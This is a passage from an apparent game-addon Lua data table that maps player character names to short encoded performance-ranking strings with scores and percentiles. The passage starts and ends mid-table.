["Yumingzhou"] = "RT:168/57%RB:335/69%UM:195/25%",
["Bholesniff"] = "CT:50/16%RB:483/70%",
["Alicely"] = "ET:365/76%EB:624/88%EM:674/81%",
["Stanhalen"] = "CB:186/21%UM:218/25%",
["Todorroki"] = "CB:36/3%CM:180/24%",
["Sccscc"] = "UT:336/42%RM:520/61%",
["Grimful"] = "UB:276/37%",
["Solobok"] = "RM:309/62%",
["Stealthmeow"] = "RT:574/74%EB:513/84%UM:247/29%",
["Sinecure"] = "EB:599/79%EM:747/79%",
["Shonkykong"] = "RB:494/66%CM:152/19%",
["Apôphis"] = "CB:34/5%",
["Zhuanai"] = "UT:239/31%UB:295/39%UM:113/37%",
["Ellamaraine"] = "UM:302/36%",
["Drakos"] = "RB:418/54%EM:744/81%",
["Snedges"] = "RM:564/66%",
["Shmorgabob"] = "CB:137/14%UM:238/26%",
["Darnim"] = "UB:308/41%UM:410/46%",
["Jgray"] = "RM:607/69%",
["Doyoudie"] = "CB:168/22%UM:415/46%",
["Sundubu"] = "UM:176/48%",
["Yosi"] = "RB:472/63%EM:844/88%",
["Charraice"] = "RB:390/54%UM:310/37%",
["Karebearz"] = "CT:189/22%",
["Smoldps"] = "RT:479/65%EB:621/80%RM:646/72%",
["Aristhrottle"] = "UT:315/44%RB:456/60%RM:492/56%",
["Elendil"] = "UT:347/43%UB:127/28%RM:503/58%",
["Lebronbronjr"] = "RT:137/51%RB:389/54%UM:330/39%",
["Mdg"] = "UB:221/27%RM:359/71%",
["Woshigege"] = "CM:44/5%",
["Drwarthog"] = "EB:480/85%CM:61/8%",
["Huntersakura"] = "ET:420/94%RB:278/62%CM:41/4%",
["Beelee"] = "RT:224/71%CB:82/20%",
["Hansam"] = "CT:37/10%CB:91/9%",
["Elderon"] = "CB:51/5%",
["Saeyon"] = "UT:311/40%UB:369/49%UM:283/33%",
["Tickkled"] = "ET:567/75%",
["Zeerro"] = "CB:120/15%RM:552/61%",
["Chunkulus"] = "UT:386/48%EB:586/82%RM:328/69%",
["Vuzegg"] = "UM:212/27%",
["Bowltin"] = "CM:72/8%",
["Warkrime"] = "CB:24/0%CM:65/24%",
["Cephas"] = "CM:72/9%",
["Veganthings"] = "CM:97/10%",
["Zensi"] = "RM:420/60%",
["Azamat"] = "CB:28/1%UM:283/33%",
["Bigunknown"] = "LT:844/97%EB:544/77%RM:529/62%",
["Swoope"] = "EB:532/76%RM:515/57%",
["Vadric"] = "ET:272/81%EB:553/78%EM:418/78%",
["Maxhardcore"] = "CT:56/6%CB:165/21%CM:80/24%",
["Linken"] = "CB:145/15%CM:67/9%",
["Toiletbowl"] = "CB:65/13%UM:90/27%",
["Eggegger"] = "CB:32/2%UM:152/49%",
["Lawngkawk"] = "CM:57/7%",
["Dennîs"] = "RB:495/70%EM:815/90%",
["Jawsr"] = "CT:67/8%RB:243/55%RM:617/67%",
["Papercut"] = "CB:25/0%CM:196/24%",
["Silenti"] = "CM:101/13%",
["Réckless"] = "RB:314/68%UM:305/34%",
["Strwbrydnish"] = "RT:177/63%RB:335/70%EM:719/76%",
["Fuegoo"] = "RT:496/62%RB:407/58%CM:92/10%",
["Myage"] = "UT:321/44%RB:408/52%RM:364/66%",
["Thotygodx"] = "ET:683/88%EB:683/87%EM:738/79%",
["Bababy"] = "CM:67/9%",
["Daisychan"] = "ET:312/86%EB:613/81%EM:523/84%",
["Needyoudo"] = "RT:519/69%UB:303/43%",
["Azurdream"] = "RT:101/56%CM:52/19%",
["Clss"] = "RT:525/70%EB:607/84%EM:761/86%",
["Plendra"] = "EB:467/85%UM:115/38%",
["Diggie"] = "ET:717/92%EB:581/76%LM:796/96%",
["Åestus"] = "CM:54/20%",
["Sosum"] = "CT:47/5%CB:29/2%RM:229/62%",
["Tyndale"] = "CT:148/16%CB:125/13%",
["Calüm"] = "CB:66/7%UM:397/45%",
["Totemzu"] = "RB:476/69%RM:232/57%",
["Oxye"] = "RB:413/56%CM:166/22%",
["Vikiz"] = "UT:211/25%RB:225/53%RM:456/54%",
["Freedive"] = "CM:154/18%",
["Jerdin"] = "RB:479/64%EM:453/79%",
["Landcaster"] = "RB:446/64%EM:399/78%",
["Sunshinee"] = "UT:361/47%RB:387/53%RM:637/74%",
["Acede"] = "UB:294/39%",
["Tortenis"] = "CB:129/14%UM:271/31%",
["Zuhk"] = "RT:493/67%EB:573/75%RM:553/62%",
["Lazywalrus"] = "CB:106/12%UM:431/48%",
["Twisted"] = "UB:205/26%RM:213/50%",
["Brikbrik"] = "UB:293/41%UM:338/44%",
["Ainzoolgown"] = "CB:22/2%UM:159/45%",
["Señorzug"] = "UB:267/35%RM:489/53%",
["Mahsissham"] = "UB:100/25%CM:206/23%",
["Waldemar"] = "CT:44/9%UB:239/27%RM:510/58%",
["Jjruggie"] = "UM:226/27%",
["Erodan"] = "CB:114/11%RM:555/64%",
["Gimeyowallet"] = "CM:100/13%",
["Naturaferox"] = "RM:379/65%",
["Shadowfoot"] = "UB:325/43%CM:78/10%",
["Phopho"] = "UT:376/46%RB:327/71%EM:687/79%",
["Catellyn"] = "CB:29/0%UM:407/47%",
["Legeberil"] = "UT:141/47%UB:333/45%RM:530/61%",
["Azagathar"] = "UT:296/41%RB:281/62%RM:605/68%",
["Hordeng"] = "RM:158/50%",
["Cilok"] = "UM:392/44%",
["Fash"] = "RB:233/53%UM:375/43%",
["Svet"] = "CT:162/18%CB:166/19%UM:302/36%",
["Totemorc"] = "CM:9/8%",
["Tooñworld"] = "CM:140/16%",
["Pennetration"] = "CB:88/22%UM:157/41%",
["Cuddletips"] = "CM:96/12%",
["Fortunateson"] = "RB:390/52%UM:352/40%",
["Shiftez"] = "RB:379/73%RM:573/64%",
["Ketamineuser"] = "ET:211/77%EB:460/88%CM:92/13%",
["Shenronn"] = "RB:495/71%EM:761/85%",
["Zelpyn"] = "UM:241/27%",
["Koffimg"] = "CM:29/1%",
["Bloodnzug"] = "CT:107/18%CB:77/18%UM:411/47%",
["Xiaoxiaosu"] = "ST:807/99%LB:782/98%LM:948/96%",
["Halisen"] = "LT:743/95%EB:718/91%EM:861/91%",
["Snoopdodubb"] = "UT:225/32%RB:353/72%RM:211/53%",
["Hugeunknown"] = "ET:671/84%EB:525/75%EM:723/82%",
["Tfar"] = "CT:132/17%UB:120/31%",
["Limboo"] = "CT:98/12%CM:105/15%",
["Twinkish"] = "ET:707/91%EB:688/88%EM:893/93%",
["Potåto"] = "CM:72/9%",
["Xps"] = "RT:583/74%EB:542/78%RM:213/51%",
["Shardtwo"] = "LT:757/96%LB:772/97%LM:944/97%",
["Danceparty"] = "RB:406/58%CM:54/5%",
["Xiao"] = "CB:45/10%LM:994/98%",
["Codyd"] = "UT:194/29%EB:593/77%EM:529/84%",
["Aoisora"] = "UT:206/27%RB:320/69%UM:424/47%",
["Myrmidons"] = "CB:151/19%CM:27/1%",
["Mfrerst"] = "RB:373/52%RM:544/64%",
["Gugrandmama"] = "UB:284/38%",
["Ohbama"] = "CT:108/18%UB:185/44%UM:417/48%",
["Widepeeposad"] = "RB:311/70%",
["Darkjojo"] = "UT:337/43%RB:471/63%RM:559/62%",
["Vanhallen"] = "RB:218/65%RM:256/57%",
["Xblast"] = "CB:33/1%UM:76/27%",
["Frostbrew"] = "CT:64/24%UB:345/47%RM:515/60%",
["Itscoronatim"] = "UT:259/31%UB:288/38%",
["Kixxs"] = "UT:215/28%RB:426/58%UM:421/47%",
["Chuff"] = "ET:635/78%EB:522/92%RM:508/59%",
["Skunty"] = "RB:251/58%RM:485/54%",
["Analee"] = "CM:107/14%",
["Rhap"] = "UM:164/45%",
["Majinbomb"] = "UM:257/29%",
["Oofnix"] = "RB:218/56%RM:563/66%",
["Iskur"] = "CM:158/21%",
["Buriedprayer"] = "UB:189/46%UM:217/25%",
["Animosity"] = "UM:365/42%",
["Saintwo"] = "CM:110/14%",
["Swampfoxy"] = "CT:75/9%UB:226/29%UM:426/48%",
["Bighunta"] = "UM:275/31%",
["Evelynns"] = "UB:237/31%CM:60/7%",
["Trackiotomy"] = "CT:63/7%CM:30/2%",
["Peskygnome"] = "RB:393/52%UM:239/29%",
["Kinestra"] = "UM:318/38%",
["Dumbbo"] = "ET:695/90%EB:681/87%EM:760/82%",
["Forgesteel"] = "ST:801/99%LB:796/98%EM:880/90%",
["Shawtyleft"] = "UT:103/38%CB:4/0%CM:36/4%",
["Kwazar"] = "UT:83/34%CB:37/6%UM:109/34%",
["Shrewd"] = "UB:142/39%RM:517/61%",
["Adney"] = "CT:158/24%RB:398/51%RM:298/60%",
["Chones"] = "EB:672/87%EM:853/89%",
["Siabah"] = "CB:57/5%CM:66/9%",
["Headpatspls"] = "UM:211/30%",
["Kdike"] = "CT:125/16%CM:144/20%",
["Eddielina"] = "UM:281/34%",
["Applechips"] = "RT:416/57%EB:592/77%RM:262/60%",
["Applepi"] = "UT:397/49%RB:407/58%EM:792/89%",
["Bluesand"] = "RB:366/50%RM:474/56%",
["Haydy"] = "UB:172/49%",
["Baturuz"] = "RT:452/62%RB:462/61%CM:109/14%",
["Phantomassas"] = "RT:407/53%UB:362/48%RM:490/55%",
["Ieras"] = "EB:712/90%RM:620/69%",
["Healiumm"] = "UB:128/46%UM:84/42%",
["Daggerfist"] = "CM:35/3%",
["Coalery"] = "CB:82/10%CM:58/22%",
["Adobe"] = "UB:326/44%UM:397/45%",
["Erispera"] = "CB:169/21%CM:31/2%",
["Darkplaces"] = "CB:126/12%CM:62/22%",
["Spicypepper"] = "CM:36/3%",
["Kaja"] = "UM:330/38%",
["Thicums"] = "RM:476/56%",
["Danaibi"] = "UT:368/45%EB:420/84%RM:435/51%",
["Keylows"] = "CM:60/22%",
["Haight"] = "CM:135/17%",
["Tianfuhetao"] = "UB:238/26%CM:25/0%",
["Gelsey"] = "UB:146/37%UM:267/30%",
["Wentiàn"] = "CM:50/10%",
["Sarahsunders"] = "ET:689/89%EB:643/83%CM:105/14%",
["Leakis"] = "UT:213/25%",
["Rénata"] = "CT:50/18%CB:46/5%CM:122/17%",
["Bahtu"] = "UM:92/32%",
["Rotsen"] = "RT:511/69%EB:726/92%LM:926/95%",
["Chrislongtv"] = "CT:49/14%RB:308/67%RM:330/69%",
["Ouligei"] = "UT:223/28%UM:300/36%",
["Hectok"] = "CT:129/14%UB:241/31%RM:626/73%",
["Ginomito"] = "UT:92/42%RB:487/68%UM:126/43%",
["Yodi"] = "UM:371/42%",
["Worik"] = "RT:192/67%RB:522/69%RM:349/65%",
["Bicolas"] = "UT:382/47%RB:236/58%UM:108/36%",
["Shoopah"] = "RT:487/66%RB:476/63%RM:576/65%",
["Urzaslight"] = "UT:124/39%CB:142/15%UM:356/42%",
["Rufflad"] = "RT:406/56%RB:441/57%",
["Oat"] = "LT:756/96%EB:744/94%EM:544/85%",
["Eruantiel"] = "UT:232/27%UB:252/33%RM:303/58%",
["Murdraffe"] = "CT:58/15%UB:110/26%",
["Bruvac"] = "CB:166/19%RM:459/54%",
["Bigdiesel"] = "CB:100/10%",
["Classicgnome"] = "ET:609/80%EB:686/88%EM:729/78%",
["Oatmeel"] = "UB:217/26%",
["Mobcycle"] = "RT:452/56%RB:508/73%EM:723/81%",
["Ripsij"] = "EB:711/90%EM:726/79%",
["Bungle"] = "ST:705/99%LB:792/98%LM:945/96%",
["Scaryqueefs"] = "CT:152/19%UB:155/37%RM:691/74%",
["Kaybanger"] = "RT:493/67%EB:442/83%",
["Ratfarm"] = "CT:0/3%",
["Dins"] = "RM:188/50%",
["Hobojo"] = "UM:412/44%",
["Grayhawke"] = "UB:149/39%CM:126/14%",
["Gnossos"] = "UM:357/41%",
["Atapi"] = "CM:88/13%",
["Noradrax"] = "UM:361/41%",
["Cuty"] = "ET:629/79%RB:410/58%EM:721/82%",
["Gerbell"] = "UT:205/30%RB:443/58%UM:390/44%",
["Kenner"] = "UT:211/27%CM:132/20%",
["Anklebiters"] = "EB:587/81%EM:757/85%",
["Dekay"] = "UM:291/35%",
["Fpa"] = "CB:75/6%UM:258/31%",
["Fadead"] = "RM:669/69%",
["Bigfrick"] = "ET:608/80%EB:647/84%EM:714/76%",
["Amppal"] = "UB:267/35%RM:528/61%",
["Onbridgewu"] = "UM:418/49%",
["Emmber"] = "UT:294/38%RB:435/59%RM:656/70%",
["Valentinac"] = "CB:9/0%CM:34/3%",
["Jelalar"] = "CM:27/0%",
["Cellenna"] = "UB:146/37%UM:331/37%",
["Byebyebuff"] = "CM:35/2%",
["Yangshen"] = "UB:344/48%RM:486/57%",
["Niutou"] = "CB:71/8%RM:545/60%",
["Cinsan"] = "UM:72/27%",
["Hordemomm"] = "ET:593/79%LB:760/96%EM:690/76%",
["Noxioustotem"] = "ET:598/90%EB:511/90%RM:417/60%",
["Doinlaundry"] = "CB:171/21%",
["Shigella"] = "CB:143/18%CM:125/15%",
["Rythina"] = "ET:359/75%EB:504/78%RM:397/61%",
["Babigirl"] = "CT:32/7%CB:29/1%",
["Exbox"] = "UT:255/33%RB:543/73%RM:642/70%",
["Aotp"] = "UT:254/30%RB:366/51%UM:86/25%",
["Pyromanjaro"] = "UT:312/40%UB:297/40%RM:209/59%",
["Ravensmage"] = "CB:156/20%UM:152/49%",
["Chze"] = "ET:598/79%RB:398/57%EM:707/82%",
["Yywarrior"] = "UT:96/39%UB:178/42%RM:525/59%",
["Terizla"] = "CM:41/4%",
["Eightgold"] = "EB:559/79%RM:456/58%",
["Vascon"] = "ET:615/81%EB:539/90%RM:636/71%",
["Teldrassíl"] = "UB:273/36%LM:962/98%",
["Yellowflash"] = "CM:22/22%",
["Clip"] = "RB:497/68%UM:145/43%",
["Kelbert"] = "RB:209/50%",
["Billyshatner"] = "EB:586/77%",
["Frozeheals"] = "UB:223/28%RM:245/62%",
["Popncherrys"] = "CT:70/8%UB:352/46%EM:512/81%",
["Ntez"] = "RT:467/60%UB:298/39%EM:668/76%",
["Elizabley"] = "EB:734/93%RM:558/63%",
["Teddyhuggins"] = "RB:562/74%RM:291/64%",
["Kershaw"] = "EB:398/77%UM:398/43%",
["Jlannister"] = "RT:441/56%EB:535/76%EM:700/79%",
["Meatrain"] = "RB:444/60%",
["Isl"] = "CM:16/15%",
["Deepinmist"] = "ET:659/85%EB:666/85%EM:916/94%",
["Sparklett"] = "UM:363/43%",
["Ibuli"] = "CM:20/3%",
["Caromane"] = "CT:26/10%CB:185/24%RM:476/56%",
["Orinthia"] = "RB:232/55%RM:615/72%",
["Bearcow"] = "RT:177/73%CB:37/7%RM:565/73%",
["Tomater"] = "CB:32/2%UM:400/45%",
["Taxrevenue"] = "CT:33/3%CM:58/8%",
["Cheeri"] = "CM:140/18%",
["Popowz"] = "UM:114/40%",
["Longigc"] = "CM:40/4%",
["Ayakam"] = "ET:597/79%UB:211/27%RM:469/55%",
["Onta"] = "CM:42/14%",
["Miniphone"] = "RB:461/73%RM:360/66%",
["Flyinnature"] = "CB:29/1%CM:112/14%",
["Eledram"] = "RT:410/50%CB:72/17%UM:292/34%",
["Clead"] = "CT:31/5%EB:532/76%RM:635/74%",
["Hammerinhank"] = "RB:402/57%CM:100/10%",
["Doupi"] = "RT:416/53%EB:424/83%EM:385/75%",
["Poorfarmer"] = "UM:215/25%",
["Shîttër"] = "EB:627/81%EM:737/78%",
["Cramm"] = "RM:308/72%",
["Milksaucer"] = "ET:426/92%RB:233/57%RM:237/61%",
["Overhealed"] = "UT:95/30%RB:286/65%UM:223/26%",
["Tyrwar"] = "ET:728/93%EB:660/84%EM:750/81%",
["Smallmage"] = "EB:574/76%RM:672/65%",
["Chibbity"] = "CT:64/5%CB:82/7%UM:292/34%",
["Falkcor"] = "ET:248/78%",
["Imdaddi"] = "EM:628/77%",
["Diretribute"] = "RB:363/74%RM:683/74%",
["Meski"] = "RM:198/54%",
["Steenlinz"] = "CM:31/2%",
["Wizzrad"] = "CM:28/7%",
["Mwp"] = "EB:380/76%EM:419/77%",
["Cocopelli"] = "CB:19/0%RM:339/71%",
["Dregelord"] = "UB:250/29%",
["Mamayukero"] = "RT:480/65%EB:601/80%RM:577/64%",
["Ambusch"] = "ET:596/78%EB:724/92%CM:130/17%",
["Kindathicc"] = "CB:125/13%UM:322/38%",
["Mimiq"] = "UB:271/36%",
["Thamuzu"] = "CB:55/13%CM:149/20%",
["Harmonix"] = "CB:112/11%UM:255/29%",
["Noideypal"] = "CT:180/20%RB:447/63%RM:504/58%",
["Pandarider"] = "UT:353/47%UB:349/47%UM:423/47%",
["Shammer"] = "CT:43/3%RB:261/63%UM:102/34%",
["Thuggle"] = "EB:360/75%UM:201/40%",
["Qwertywar"] = "ET:598/79%EB:642/83%RM:654/72%",
["Rotspren"] = "UB:277/36%RM:496/54%",
["Masako"] = "CB:103/12%CM:37/3%",
["Deliqt"] = "RT:201/69%RB:354/73%RM:381/74%",
["Harden"] = "UB:354/44%UM:374/43%",
["Calvy"] = "RT:165/60%UB:352/48%LM:938/95%",
["Shaperson"] = "CB:160/18%CM:183/21%",
["Laxan"] = "CB:29/4%CM:126/17%",
["Phoque"] = "UB:213/49%UM:281/33%",
["Destainlol"] = "EB:535/77%RM:468/55%",
["Original"] = "UB:309/37%RM:474/54%",
["Soypilled"] = "CM:90/13%",
["Greatwizzard"] = "UM:337/40%",
["Manaburnz"] = "CT:45/3%UB:262/34%CM:115/13%",
["Ceberus"] = "CM:44/14%",
["Dragongate"] = "RT:423/55%EB:564/75%RM:638/69%",
["Realnasty"] = "CT:34/2%CB:181/21%RM:615/72%",
["Roknor"] = "UT:136/42%RB:477/69%RM:295/65%",
["Pedant"] = "CT:59/15%UM:314/37%",
["Digitized"] = "UT:314/42%RB:547/74%RM:666/72%",
["Nosforatwo"] = "CT:146/16%UB:213/26%UM:285/34%",
["Salima"] = "CT:12/21%CB:48/3%UM:173/48%",
["Happyhacker"] = "CT:31/2%",
["Suyoshi"] = "UT:342/45%RB:493/67%",
["Kikuo"] = "ET:666/87%EB:735/93%",
["Pvpene"] = "RT:391/51%UB:101/29%",
["Rapcoree"] = "ET:644/85%EB:622/82%RM:541/60%",
["Cherishme"] = "ET:737/90%EB:619/86%RM:623/72%",
["Rajayim"] = "UB:182/48%",
["Bullshizzle"] = "UB:233/30%RM:565/62%",
["Nightmancome"] = "UT:351/46%RB:429/58%CM:182/22%",
["Psychofreak"] = "ET:623/82%LB:754/95%EM:783/84%",
["Lannicton"] = "CT:37/4%CB:40/4%",
["Lazerhawk"] = "RB:249/60%RM:493/58%",
["Yubbi"] = "CM:58/3%",
["Badmenh"] = "CM:13/3%",
["Bigcannon"] = "RB:431/59%RM:561/62%",
["Alhuwa"] = "ET:659/86%EB:744/94%RM:644/72%",
["Soolz"] = "CT:139/23%RB:366/50%RM:226/61%",
["Farruko"] = "CB:27/0%",
["Lovka"] = "CM:173/21%",
["Vergale"] = "CT:36/10%CB:85/10%CM:138/18%",
["Transitioner"] = "ET:559/81%LB:691/95%EM:770/92%",
["Dontauro"] = "CT:52/16%RM:181/65%",
["Dabbr"] = "UT:294/38%UB:256/33%UM:225/27%",
["Wobblesdruid"] = "ET:633/80%RB:431/62%EM:647/75%",
["Valkira"] = "UT:274/36%CB:157/19%RM:526/52%",
["Nobodycare"] = "CT:82/8%CB:37/4%UM:284/33%",
["Ghostcry"] = "ET:301/86%EB:444/82%UM:373/43%",
["Keyomi"] = "CT:184/23%UB:266/34%",
["Pizzachicken"] = "UT:344/44%RB:381/52%RM:452/53%",
["Roudoudou"] = "CT:81/8%CB:37/2%RM:419/50%",
["Kàrnage"] = "ET:639/84%LB:703/97%EM:757/82%",
["Tenyearsold"] = "RT:554/73%UM:365/42%",
["Doraemonlan"] = "CB:31/3%UM:327/39%",
["Salvific"] = "RT:500/68%EB:576/76%EM:755/89%",
["Dieseloctane"] = "UT:69/28%RB:471/62%CM:15/8%",
["Tricku"] = "RB:426/57%RM:525/58%",
["Fantalife"] = "UT:247/31%RB:439/59%RM:481/54%",
["Vinegarslayr"] = "RB:416/54%RM:563/64%",
["Greae"] = "RM:303/64%",
["Goneagain"] = "CM:173/21%",
["Beggi"] = "CT:43/17%UB:300/35%UM:242/28%",
["Syakira"] = "CT:0/2%CB:66/17%CM:36/4%",
["Killsaw"] = "RB:225/51%UM:324/37%",
["Balithzar"] = "RB:156/59%CM:12/10%",
["Terrifi"] = "EB:461/87%CM:70/20%",
["Category"] = "RB:227/56%RM:188/51%",
["Neik"] = "UB:246/32%",
["Silkymilk"] = "CT:118/12%EB:443/86%UM:358/41%",
["Dahgomgar"] = "ET:582/78%EB:642/83%RM:518/59%",
["Indicca"] = "EB:593/89%",
["Acts"] = "UT:328/42%UB:195/25%UM:287/34%",
["Adominion"] = "UT:334/41%RB:481/69%CM:122/14%",
["Spaztik"] = "EB:530/76%",
["Frightmares"] = "CB:116/15%CM:97/13%",
["Niraw"] = "UB:164/40%",
["Femtos"] = "RT:545/73%EB:725/94%UM:338/45%",
["Tft"] = "RB:555/74%RM:447/51%",
["ßlazebub"] = "CM:62/7%",
["Heemstar"] = "CT:17/24%RM:209/50%",
["Tufflo"] = "CM:80/10%",
["Dizzley"] = "RM:505/59%",
["Chupicabri"] = "UB:189/25%CM:91/14%",
["Priestynn"] = "RT:418/52%UB:346/48%CM:41/3%",
["Hectorzeroni"] = "UM:287/34%",
["Ratpocalypse"] = "CM:115/15%",
["Crazyfreak"] = "UT:365/44%UB:350/49%RM:650/74%",
["Dorgel"] = "ET:563/75%EB:587/77%RM:665/74%",
["Xrl"] = "CB:30/1%",
["Darlingmomo"] = "ET:644/81%RB:390/55%RM:577/68%",
["Bigtiny"] = "RT:470/62%RB:274/66%RM:621/72%",
["Hornymon"] = "CT:103/15%CB:194/23%",
["Izzamuzzic"] = "CT:64/24%UB:134/35%RM:363/73%",
["Worldwarlock"] = "CT:65/22%RB:394/53%UM:329/38%",
["Blueberry"] = "UT:287/37%UB:190/25%",
["Deadlypewpew"] = "LT:754/95%EB:724/92%UM:77/27%",
["Okboomerkin"] = "ET:347/78%RB:345/67%UM:52/31%",
["Vng"] = "ET:564/76%UB:333/41%RM:635/71%",
["Ianziering"] = "RT:579/72%UB:227/29%RM:605/70%",
["Zughugz"] = "UT:266/34%UB:354/47%EM:698/75%",
["Befealess"] = "UB:241/32%UM:301/36%",
["Nxxtrash"] = "CB:72/8%CM:197/23%",
["Nolovë"] = "CM:109/14%",
["Jflo"] = "RM:304/66%",
["Moothersmilk"] = "UB:251/32%UM:269/33%",
["Burstdamage"] = "CB:153/20%UM:338/45%",
["Tyrotia"] = "RT:399/52%EB:676/91%EM:747/87%",
["Tethersx"] = "RT:410/56%LB:753/95%EM:775/83%",
["Bsx"] = "CB:94/12%UM:256/31%",
["Teeby"] = "UT:321/42%RB:392/56%UM:345/42%",
["Biggboii"] = "CB:130/16%CM:70/9%",
["Traxèx"] = "CT:166/21%RB:474/65%RM:655/71%",
["Soha"] = "RB:510/67%EM:731/79%",
["Sayolana"] = "CB:155/17%CM:182/22%",
["Shiietyclass"] = "EB:526/75%",
["Arrana"] = "CB:90/11%RM:533/59%",
["Akhira"] = "UB:299/40%RM:673/73%",
["Captschmeat"] = "UT:263/33%RB:479/67%RM:586/68%",
["Fidjunpukah"] = "CB:146/18%UM:249/30%",
["Kawaiicoree"] = "UT:234/30%EB:335/75%RM:464/54%",
["Ezchutuan"] = "CB:105/10%",
["Lilcayman"] = "CT:44/18%CB:38/3%UM:243/28%",
["Magajuana"] = "CM:46/6%",
["Gordac"] = "EM:691/79%",
["Killrigrit"] = "EB:681/91%RM:552/65%",
["Angelfury"] = "CM:237/23%",
["Ravenclawz"] = "CM:22/4%",
["Ricknmorty"] = "CT:47/16%CB:80/20%RM:183/55%",
["Cranfrable"] = "CT:138/17%UB:297/38%UM:234/28%",
["Shikikonei"] = "UT:72/29%UB:106/25%",
["Charmeleon"] = "UB:129/36%UM:100/34%",
["Insomniatic"] = "UM:320/38%",
["Icespecialty"] = "UT:357/44%UB:205/25%RM:409/65%",
["Druko"] = "RT:416/63%RB:274/56%",
["Candyjazz"] = "UT:345/46%RB:313/68%",
["Sneks"] = "UT:257/33%CB:95/11%CM:47/5%",
["Sourgirl"] = "EB:585/77%",
["Jenelly"] = "CM:28/1%",
["Linkins"] = "RB:496/70%UM:255/31%",
["Twohell"] = "ET:598/79%EB:716/91%EM:881/92%",
["Happypriest"] = "EB:648/83%UM:235/28%",
["Mavericke"] = "UB:310/41%RM:503/56%",
["Erpangmaster"] = "CB:150/18%UM:237/27%",
["Hÿpe"] = "CB:34/3%",
["Zlyr"] = "UB:341/47%",
["Ibew"] = "RB:475/65%RM:508/56%",
["Tacoon"] = "RT:384/50%EB:402/82%RM:446/53%",
["Devilsass"] = "CT:57/15%CB:76/6%UM:311/37%",
["Lambertb"] = "CM:46/16%",
["Albenzilly"] = "RB:487/68%UM:388/46%",
["Dobinmushi"] = "RB:245/60%UM:348/40%",
["Stickybubble"] = "UT:159/49%CB:93/9%UM:378/44%",
["Balbosa"] = "CT:100/10%UB:215/49%UM:348/40%",
["Alakazåm"] = "RB:220/56%CM:152/21%",
["Hooberstoot"] = "CM:6/3%",
["Maylights"] = "UB:147/36%UM:87/25%",
["Chainhealer"] = "EB:622/86%",
["Zèro"] = "RB:363/73%",
["Syrahtonin"] = "UT:245/29%RB:243/57%RM:580/68%",
["Jedic"] = "UB:275/35%RM:502/56%",
["Ribz"] = "UM:89/35%",
["Udderfailure"] = "UM:197/49%",
["Yskrod"] = "EB:625/81%EM:688/92%",
["Sneakyman"] = "UM:210/25%",
["Buffremover"] = "RM:511/60%",
["Anselma"] = "CB:119/15%UM:213/27%",
["Coldwarrior"] = "RB:260/58%UM:290/33%",
["Teutorigos"] = "RT:172/57%RB:339/74%",
["Arquimedes"] = "CT:15/4%CB:5/0%CM:58/6%",
["Clistergal"] = "ET:462/94%EB:404/78%RM:203/53%",
["Kagraxx"] = "RT:516/70%UB:297/35%RM:272/61%",
["Lokken"] = "UT:252/30%RB:301/69%RM:518/61%",
["Malsina"] = "EM:728/78%",
["Epsteined"] = "CT:72/8%UB:145/38%RM:231/58%",
["Thesoftpill"] = "UT:298/41%CB:96/9%",
["Brownjian"] = "ET:615/81%RB:504/66%",
["Cleaverend"] = "RT:515/70%UB:230/25%",
["Skeezzer"] = "RT:523/66%EB:527/75%CM:42/10%",
["Adisty"] = "ET:593/79%EB:569/75%EM:719/78%",
["Ploot"] = "LT:784/98%LB:766/96%CM:148/18%",
["Khrush"] = "EB:572/75%EM:688/92%",
["Udyrs"] = "CB:28/1%UM:82/29%",
["Infms"] = "CM:23/5%",
["Lenal"] = "EB:438/80%EM:827/93%",
["Wennise"] = "CM:89/13%",
["Sacha"] = "EB:608/90%LM:921/97%",
["Rimo"] = "RB:424/60%CM:180/20%",
["Joomondo"] = "CT:99/10%CB:26/0%UM:232/27%",
["Zubi"] = "CB:183/21%RM:486/56%",
["Verydumbguy"] = "RM:591/66%",
["Niceswan"] = "CM:43/5%",
["Destinyman"] = "CB:29/0%UM:146/39%",
["Xynznobu"] = "CM:71/10%",
["Voidcaster"] = "CB:175/23%UM:83/32%",
["Casualtankin"] = "UT:13/39%UB:160/41%UM:211/26%",
["Genderfluidd"] = "UT:244/32%RB:437/62%RM:537/63%",
["Covidwizard"] = "CT:48/5%RB:376/50%UM:67/25%",
["Snayen"] = "UM:78/25%",
["Lynixx"] = "CM:131/18%",
["Ironkilohp"] = "UM:286/34%",
["Lickfoot"] = "RM:268/63%",
["Miìr"] = "RT:385/53%EB:395/77%EM:870/91%",
["Umagebro"] = "CM:104/15%",
["Shaiton"] = "RT:252/73%RB:263/62%RM:486/71%",
["Bbwkween"] = "CT:60/22%",
["Mallets"] = "ET:720/92%EB:710/90%EM:911/94%",
["Thêðn"] = "CM:173/21%",
["Trulicity"] = "ET:732/89%EB:666/90%",
["Kosek"] = "ET:645/85%",
["Royda"] = "UT:280/39%",
["Reebb"] = "UT:160/25%RB:475/62%RM:274/62%",
["Erczof"] = "UM:408/48%",
["Solgrim"] = "CT:94/10%UB:270/35%",
["Zurg"] = "UB:238/30%",
["Khris"] = "CT:102/13%CB:136/17%",
["Neosporin"] = "CT:176/20%CB:8/9%RM:546/64%",
["Yvv"] = "ET:570/83%RB:453/72%",
["Saucekay"] = "ET:697/89%EB:699/89%",
["Iibnsar"] = "UM:106/39%",
["Yikes"] = "UT:299/38%EB:611/80%UM:343/40%",
["Pewatyou"] = "CB:88/23%UM:69/26%",
["Darksails"] = "RT:142/53%RB:348/71%UM:278/32%",
["Notolis"] = "CB:108/24%CM:73/7%",
["Zevalia"] = "CT:49/7%RB:210/52%UM:323/39%",
["Enormousgloc"] = "CT:27/3%CB:82/23%UM:126/43%",
["Delanan"] = "CB:90/9%UM:140/41%",
["Crustytank"] = "UT:160/25%EB:584/76%UM:287/33%",
["Bidets"] = "CT:36/4%EB:572/76%RM:489/55%",
["Kooblie"] = "CT:99/17%CB:110/11%RM:449/51%",
["Haianu"] = "CB:70/6%EM:727/75%",
["Drmemorial"] = "UB:268/36%CM:96/14%",
["Ginsengpower"] = "CT:194/22%RB:433/62%CM:194/22%",
["Cougbait"] = "UB:175/47%",
["Wizzardofbob"] = "CT:76/9%CB:116/13%CM:3/1%",
["Mctanksalot"] = "ET:559/75%EB:629/81%RM:571/64%",
["Goliatt"] = "CB:198/23%CM:105/11%",
["Whitemoney"] = "CB:159/21%EM:880/89%",
["Bakstabbrr"] = "CT:173/22%RB:481/64%",
["Queball"] = "UB:219/29%",
["Bradcrit"] = "UM:208/25%",
["Zereesthis"] = "UM:113/37%",
["Bluecrayons"] = "ET:256/77%EB:588/77%EM:793/83%",
["Aimiliya"] = "UB:214/28%UM:239/30%",
["Kristao"] = "UM:324/38%",
["Peterpunter"] = "UM:338/38%",
